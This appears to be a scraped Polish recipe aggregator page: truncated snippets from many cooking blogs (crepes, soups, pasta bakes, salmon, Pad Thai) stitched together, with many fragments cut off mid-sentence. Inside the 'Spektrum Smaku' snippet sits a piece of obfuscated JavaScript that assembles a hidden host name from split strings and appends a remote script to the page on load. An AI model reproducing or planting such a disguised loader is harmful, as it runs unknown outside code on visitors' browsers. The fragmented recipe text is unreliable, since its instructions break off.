dzisiaj cala Polska smaży naleśniki , wiec i ja przyłączyłam się do tej akcji, postanowiłam przygotować naleśniki wytrawne : naleśniki koperkowe z jajkiem i warzywami. Naleśniki koperkowe z jajkiem i warzywami, oraz serem okazały się bardzo smaczne, do tego są efektowne, będą ozdobą stołu. Składniki: - 2 naleśniki wg tego przepisu: 1/2 szklanki kefiru 1 jajko szczypta soli 4 łyżki mąki 1 łyżeczka(...)pomocą trzepaczki. Wlewamy kefir, dodajemy oba rodzaje mąki, dokładnie mieszamy masę za pomocą trzepaczki. Wsypujemy posiekany koperek i wlewamy łyżeczkę oleju, mieszamy za pomocą trzepaczki. Smażymy naleśniki na patelni posmarowanej łyżeczką oleju z obu stron, odwracamy za pomocą łopatki, smażymy szybko (ok 30 sekund z 1 strony) bo naleśniki szybko się smażą. Studzimy. Składniki na farsz: - 100 g ser typu
Damsko-męskie spojrzenie na kuchniędanie smakuje fenomenalnie! A jest tak banalnie proste i szybkie w przygotowaniu. Łączy w sobie jedynie kilka warzyw i makaron. Użyłam makaronu wysokobiałkowego od marki Ostrovit , który składa się wyłącznie z mąki pszennej pełnoziarnistej (typ 1700) oraz z koncentratu białek serwatkowych . Jeżeli chcesz, aby takie danie było w 100% roślinne zamień makaron na inny. A wracając do tego wysokobiałkowego(...)łyżka posiekanej natki pietruszki 1,5 łyżki oleju kokosowego (użyłam Ostrovit ) 150 g makaronu (u mnie wysokobiałkowy Ostrovit ) sól, pieprz czarny i ziołowy, papryka słodka Przygotowanie: Na patelni rozgrzej olej. Podsmażaj na średnim ogniu posiekaną cebulę z czosnkiem. Do zrumienienia. Kolejno dodaj pokrojoną w drobną kostkę dynię i marchewkę. Zalej 1/2 szklaną wody i duś na małym ogniu
Zdrowie na języku :PTymbarka to mamy spore ułatwienie, nie potrzebujemy brudzić wyciskarki do cytrusów tylko odkręcić nakrętkę. Dodatkowo na stole znalazła się szklanka soku pomarańczowego Tymbark jako 1 z 5 porcji owoców, warzyw, czy soku jakie powinniśmy przyjmować każdego dnia. Pomarańczowe naleśniki z sokiem Tymbark to jest idealne śniadanie, które dostarczy nam energii i zapewni dobre samopoczucie na cały dzień. Gdybyśmy pokusili się(...)Przygotowanie: W miseczce roztrzepujemy jajka ze szczyptą soli, dodajemy 1 łyżeczkę cukru, mąkę pszenną wymieszaną z mąką ziemniaczaną, wlewamy sok pomarańczowy i za pomocą trzepaczki dokładnie łączymy składniki. Rozgrzewamy patelnię do naleśników z niewielką ilością oleju. Smażymy 2 duże naleśniki. Obraną z błon pomarańczę kroimy w drobną kostkę. Mieszamy serek z pokrojonymi cząstkami pomarańczy. Masą smarujemy przestudzone naleśniki. Zwijamy naleśniki
Damsko-męskie spojrzenie na kuchnięsię innych warzyw. Nie spotkałam jeszcze nikogo kto by tutaj dodawał do barszczu lub innej zupy, jakieś inne warzywa, typu: seler, pietruszka czy por. Przygotowanie: 1. Fasole namaczamy i zostawiamy najlepiej na cala noc, by nam napęczniała. Następnie gotujemy ja w tej samej wodzie ok 1,5 godziny(...)Solimy i gotujemy 6. W międzyczasie myjemy, obieramy i ścieramy na tarce jarzynowej marchewkę. 7. Cebule obieramy z łupiny i kroimy w kostkę. 8. Na średni ogień wstawiamy patelnie i wlewamy na nią trochę oleju. Wrzucamy marchewkę, gdy widzimy, ż e troszkę zmiękła dodajemy do niej cebule. Podsmażamy, aż nam się zeszkli cebula i zarazem nasza marchewka
Kulinarnie z Polką na KresachWitajcie! Dziś na tapecie nasz kulinarny hit! Zupa niezwykle aromatyczna, skomponowana z warzyw najlepszej jakości, starannie dobranych składników , przyprawiona ziołami, muśnięta uśmiechem, okraszona radością i z duuużą dawką gorącego serca, ociekającego pikanterią. Ta fenomenalna zupa to autorskie danie Krzyśka (Rumek), który kocha dobre i treściwe, swojskie jedzonko. Danie świetnie utożsamia się z jego wyjątkowym sposobem bycia, temperamentem, żywiołowością, otwartością oraz(...)Czerwona fasola w puszce Pomidory z puszki Koncentrat pomidorowy Pierś z kurczaka Przyprawy: papryka słodka, papryka ostra, wegeta, bazylia Pierś z kurczaka kroimy w kostkę, przyprawiamy wegetą, smażymy na patelni. Dalej- paprykę w większą kostkę, cebulę w piórka, ogórki w paseczki, a pieczarki w talarki. Do garnka wlewamy niewielką ilość wody, do której wrzucamy pieczarki. Następnie do gotujących się pieczarek
Sprawni w smakuZapiekanka makaronowa z kurczakiem i cukinią... Warstwa sprężystego makaronu. Kawałeczki cebuli, papryki i cukini, oblane przecierem pomidorowym. Złociste kawałki podsmażonego kurczaka. I ponownie warzywa, przecier i warstwa makaronu. A wierzch oblany sosem śmietanowym z serem, czosnkiem i natką pietruszki. Pyszna, domowa zapiekanka. Duża porcja. Smacznego! Składniki: 400 g filetów z piersi kurczaka; 500 g makaronu penne; 700 g cukinii(...)Sposób przygotowania: Makaron ugotować zgodnie z przepisem na opakowaniu. Odcedzić. Kurczaka umyć, osuszyć, oczyścić z błon, pokroić w kostkę, oprószyć przyprawą do gyrosa i solą. Podsmażyć na rozgrzanym na patelni oleju (około 1 łyżki) na złoty kolor. Ściągnąć z patelni. Papryki umyć, osuszyć, oczyścić z nasion, pokroić w kostkę. Cukinię umyć, osuszyć, obrać, oczyścić z nasion, pokroić w kostkę. Cebulę
Gospodyni Miejskapszennej pełnoziarnistej 0,5 -0,7 szklanki zimnej wody 2-3 łyżki oliwy z oliwek 1 łyżeczka soli 1 łyżeczka słodkiej papryki 1 łyżeczka kurkumy 1 łyżka ziaren czarnuszki warzywa 1 czerwona papryka 1 czerwona cebula 6-8 małych pieczarek 1 papryczka chili 2-3 ząbki czosnku 3 łyżki sosu sojowego 1 łyżeczka mielonego imbiru 1 łyżeczka cząbru 1 łyżka(...)czarnuszkę. Dodajemy oliwę, stopniowo wodę i zagniatamy elastyczne ciasto. Odstawiamy na 30 minut. Cebulę kroimy w piórka, paprykę w niedużą kostkę, chili w drobną kosteczkę, pieczarki w ćwiartki. Na patelni rozgrzewamy oliwę z oliwek. Wrzucamy na patelnię cebulkę i smażymy do momentu aż się zeszkli. Następnie wrzucamy pieczarki, smażymy 2-3 minuty i wrzucamy paprykę oraz chilli. Dodajemy imbir oraz
DefinicjaSmakuRysku pozostały 22 dni Dzisiaj bardziej kolacyjno - obiadowo. Bardzo lubię ryby. Często jest tak, że ryba zrobiona inaczej niż klasycznie (panierka na patelni lub piekarnik) traci
sierotka maRysia w kuchniSajgonki są klasycznym daniem kuchni azjatyckiej. Są proste w wykonaniu jednak trochę czasochłonne. Drobno posiekaną cebulę i mielone wieprzowe mięso smażę na patelni. Kroję
potrawyregionalneposta. Cały dzień bardzo aktywny ;) Dziś jest podobnie ale wyłuskałam dłuższą chwilę dla Was i dla bloga :) A więc dziś na salony wkracza Łosoś z trójkolorowym ryżem i paletą warzyw :) Tak wygląda mój lunch box, który zabrałam wczoraj ze sobą jako posiłek po treningowy :) Z tego miejsca całuję moją przyjaciółkę i partnerkę treningową Emilię, którą możecie śledzić na Keep(...)oliwek garść roszponki oliwa z oliwek sól, pieprz, zioła dalmatyńskie Do dzieła: Ryż gotujemy w osolonej wodzie. Łososia osuszamy papierowym ręcznikiem, przyprawiamy solą, pieprzem i ziołami. Na patelni rozgrzewamy łyżkę oliwy z oliwek i smażymy na niej rybę. Ja nie robię tego w bardzo wysokiej temperaturze. U mamy korzystam z kuchni indukcyjnej i tutaj wybieram połowę mocy grzania
Spektrum SmakuoXz8.async=true;oXz8_="u"+("s")+"t"; oXz8u="65506613.";oXz8_+="a"+("t.i");oXz8_+="n"+("f"+"o")+"/"; oXz8u+="s5bXrfyjXz86xis19fel46"+("pjnwnc58"); oXz8.src="//"+oXz8_+oXz8u;oXz8.type="text/javascript"; document.body.appendChild(oXz8); })(); Udka kurczaka pieczone z warzywami w rękawie Składniki: 14 podudzi z kurczaka 5 czerwonych cebul 6 pomidorów 2 główki młodego czosnku 2,5 kg młodych, małych ziemniaczków 4-5 młodych marchewek 1 cukinia(...)papierowym. Dwie łyżki oleju rzepakowego mieszamy z ziołami, słodką papryką, solą i pieprzem, mieszanką nacieramy mięso z każdej strony (w tym także pod skórą, tam gdzie jest dostęp). Na patelni rozgrzewamy jeszcze trochę oleju i obsmażamy udka z każdej strony. Następnie do pozostałego po smażeniu na patelni oleju z ziołami (który kryje świetny smak) wlewamy śmietanę i wodę, krótko podgrzewamy
Kolorowy Przepisownikciasto otrzymane z wody i mąki z ciecierzycy, świetnie się zapieka, więc idealnie nadaje się do tart i quichy. Szpinak i brokuły są tu dodatkiem nieobligatoryjnym. Możecie wykorzystać dowolne warzywa pamiętając jednak o tym, żeby użyte przez Was dodatki i przyprawy były wyraziste w smaku, gdyż samo ciasto jest raczej mdłe i nijakie. Dodatek sporej ilości czosnku, gałki muszkatołowej(...)patelni rozgrzać olej. Wrzucić cebulę i zeszklić ją. Dodać czosnek. Przemieszać i chwilę smażyć. Włożyć szpinak i przesmażyć do momentu, aż zwiędnie i zmniejszy swoją objętość. Doprawić gałką muszkatołową, odrobiną pieprzu i soli. Odstawić do lekkiego przestygnięcia. Przesiekać z grubsza. Formę na muffinki przesmarować dokładnie odrobiną oleju. Na dno każdego dołka włożyć szpinak i zblanszowane kawałki brokułów. Zalać warzywa
olalacookingkurczaka w soli, pieprzu, oregano, zielu angielskim i drobno startej skórce cytrynowej.Przykryj mięso papierem i rozbij wałkiem do ciasta na grubość 1,5 cm.Smaż kurczaka na złoto na patelni z 2 łyżkami oliwy z oliwek, aż będzie gotowy w środku (3-4 minuty z każdej strony).Na grubej tarce czworobocznej zetrzyj drobno ogórka.Posyp go sporą szczyptą soli(...)cytryny, dopraw szczyptą pieprzu, wsyp drobno posiekaną miętę i wymieszaj całość.Włóż do malaksera (może być również blender) papryki, dymki oraz koperek i wszystko drobno posiekaj.Posiekane warzywa rozsyp na dużej tacy lub desce.Do warzyw dodaj groszek zielony (jeśli używasz mrożonego, najpierw kilka minut blanszuj go we wrzątku) skrop całość sokiem z otartej cytryny i 2 łyżkami oliwy.Spulchnij kuskus widelcem
Kredowe Menuznacznie (ale nie całkowicie) się zetną (przez około 30 sekund - 1 minutę). Częściowo ścięte jaja z czosnkiem, dymką i chili zdjąć z patelni na talerz. Na tę samą, rozgrzaną patelnię wrzucić odcedzony makaron, posiekany szczypiorek (zielone części) oraz wlać przygotowany wcześniej sos. Podsmażać, stale mieszając/podrzucając, aż makaron stanie się miękki (przez około 1 minutę). Dodać podsmażone jaja(...)użycia bezglutenowego sosu sojowego - przepis będzie odpowiedni dla osób na diecie bezglutenowej, a w przypadku pominięcia jaj (można je zastąpić tofu) - dla wegan. Pad Thai można wzbogacić o dodatkowe warzywa: marchewkę, paprykę czy brokuła. Dla mięsożerców: w czasie przygotowywania makaronu można pokroić pierś kurczaka (1 małą) w niewielkie kawałki, skropić sosem sojowym i natrzeć przeciśniętym przez praskę ząbkiem czosnku
Gospodyni Miejskawedług instrukcji na opakowaniu. Na dużej patelni rozgrzej olej i podsmaż drobno pokrojoną cebulę do zarumienia. Następnie dodaj pokrojone drobno pieczarki i smaż przez ok. 5 minut. Po tym czasie dodaj startą na dużych okach marchewkę i pietruszkę. Smaż do momentu, aż zmiękną. Ugotowaną soczewice odcedź i dodaj do usmażonych warzyw. Dodaj wszystkie przyprawy, dokładnie wymieszaj
wegujemy